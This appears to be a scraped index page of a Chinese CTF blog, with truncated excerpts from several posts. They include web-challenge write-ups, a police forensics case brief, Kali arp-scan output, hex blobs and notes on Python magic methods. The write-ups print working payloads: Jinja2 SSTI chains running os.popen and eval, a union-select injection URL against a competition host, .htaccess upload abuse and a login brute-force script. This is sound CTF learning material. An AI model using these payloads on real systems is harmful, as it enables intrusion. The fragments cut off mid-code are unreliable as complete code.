Yiyi

xiaohuanxiongforkable/xiaohuanxiong: 开源有态度的漫画CMS 重写了init 未授权，直接访问 1http://39.107.225.62:37163/admin/Admins 支付设置中发现可命令执行代码 提交后直接回显flag snakejs速度调慢后手工打370秒打通后跳转/snake_win?username=xxxx 也可以gpt改写后直接替换源码绕过 发现有回显的点，sql注入无果后尝试ssti发现源码中有回显 11' union select 1,2,3 没有过滤 梭哈 1http://eci-2ze5o4vs0w9lqwwjqex7.cloudeci1.ichunqiu.com:5000/snake_win?username=1' union select 1,2,"{{().__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen'](& ...

Level1找<class ‘os._wrap_close’>没啥好说 12345{{''.__class__.__mro__[1].__subclasses__()[133].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("type flag").read()')}}{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}{str(''.__class__.__base__.__subclasses__()[127].__init__.__globals__[ ...

webbabyupload .htaccess 执行env即可 ez!http find-the-id tflock12345678910111213141516171819202122232425262728293031323334353637383940414243import requests url = "http://27.25.151.80:36338/login.php" # ctfer:123456# admin:x a = True with open("./passs.txt", encoding="utf-8") as fp: user_list = ["admin", "ctfer"] while a == True: i = 0 for line in fp: line = line[:-1:] # print(i) data = { "username" ...

64d1b2b1f16ab6c131313bc4d0f63331ae2939570532f467232eead5e6d141a4db74216a090f409f2d37968773b5d67b1345c0afd9d2354fc146cc075c955625c1b0b5681e740c117d2f6bbd2bb2e20d339f7acd228b20ada81fe6bdf613f66459bcae75ca3af162bd275725061d28c156e0c3527e9eca6ff0ad1cd0ac33a9de7f0e2c8f95cd629abc24abf8854298cfe45183250df9fd6fdcefb8ca94f910b1e1c43aabc6a0cc630a9fffdd97e53564b43bc46fc2945250e6f3d74de2fdbf74a61af4d7d64fc93eac6ff7d3e4c56e0d35b26ea81e5c6b874ea400c68c0a7cdaa32eba8b40683da09d68358c305e4d22cd97549163e6d3435 ...

案情简介及检材信息¶案情¶2023月10月某日，香港警方在新界某地方接报一宗凶杀案。男子李哲圆被发现用残暴的方式遭杀害。从死者李哲圖的手机检查中，警方发现最近两个月内，死者经常和一名女子李佩妍(Peggy)及三名男子分別为陈大昆(Ben)，潘志辉(Peter)和陈好(Leo)联系，怀疑他们与案件有关，随后警方提取相关人员的手机和电脑做进一步调查。 经查得知，这三名男子系同一个诈骗组织，而上述的一名女子李佩妍曾经是男死者李哲圖的女性密友。现在你被委派处理这个案件，请用以下的检材资料分析上述人士是否涉嫌犯罪，并还原事件经过。 检材列表¶ File Content 2023MeiyaCup_Group1 李佩妍的IOS(Itunes backup);李佩妍的Win10(E01);李哲图的Android(bin);李哲图的Drone(zip) 2023Meiya_Group_2 李哲图的Video(E01);李哲图的Win10(E01) 2023Meiya_Group_3 李哲图的Wireshark Capture(Pcapng),陈大昆的MacOS(Img),陈大昆的Win ...

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455┌──(root㉿kali)-[~]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.3.1 00:50:56:c0:00:08 VMware, Inc.192.168.3.2 00:50:56:e4:e9:e5 VMware, Inc.192.168.3.15 00:0c:29:57:62:33 VMware, Inc.192.168.3.254 00:50:56:e0:91:13 VMware, Inc.5 packe ...

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105┌──(root㉿kali)-[~]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.3.1 00:50:56:c0:00:08 VMware, Inc.192.168.3.2 00:50:56:e4:e9:e5 VMware, Inc.192.1 ...

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455┌──(root㉿kali)-[~]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.3.1 00:50:56:c0:00:08 VMware, Inc.192.168.3.2 00:50:56:e4:e9:e5 VMware, Inc.192.168.3.13 00:0c:29:4a:22:25 VMware, Inc.192.168.3.254 00:50:56:e4:7d:ff VMware, Inc.192.168 ...

8dcfb3ee7275f624f42fbe20c07e4a0b5765e49fcbb6eb0dc10770238c2d0b8d2bc59882458c22bdd2ac89895ed3dc405ac12a73c53aadd88f42a89d0a7f4ccb6e445e04410dfaa75c857002f6a47f5b5e48dac82008f2dfba9b07838a13ed7c0a591b37e919e5b26f7bb850d4374c82a653e360b80b194e773f88fb800b7778555e0ad49b0986990c37db7c3720f7ecb21716ffba20374e6dcbb84bf955eec5475e05298a0c8a12c7a4bb07153aa2b98d67c5930966a113cd36d80abeb2dbda368e3fc1c5374c7ee915e440d2ad5bfdfdc090f288e12de581b41bb2954d6664df0a79e1b63c4c0c68e01603042df6d041ab9ffb621c92910 ...

NodeJs原型链污染中，对象的__proto__属性，指向这个对象所在的类的prototype属性。如果我们修改了son.__proto__中的值，就可以修改父类。 在Python中，所有以双下划线__包起来的方法，统称为Magic Method（魔术方法），它是一种的特殊方法，普通方法需要调用，而魔术方法不需要调用就可以自动执行。 __class__方法用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。 （题中可以不加） __init__()方法是一种特殊的方法，被称为类的构造函数或初始化方法（类似PHP中的__construct()），当创建了这个类的实例时就会调用该方法。 __globals__对 保存函数全局变量的字典 的引用——定义函数的模块的全局命名空间。只读，但是可以修改无继承关系的类属性甚至全局变量 __file__全局变量，返回当前文件路径（目录） 12345678910111213#globals辨析secret_var = 114def test(): passclass a: def __init__(self): pa ...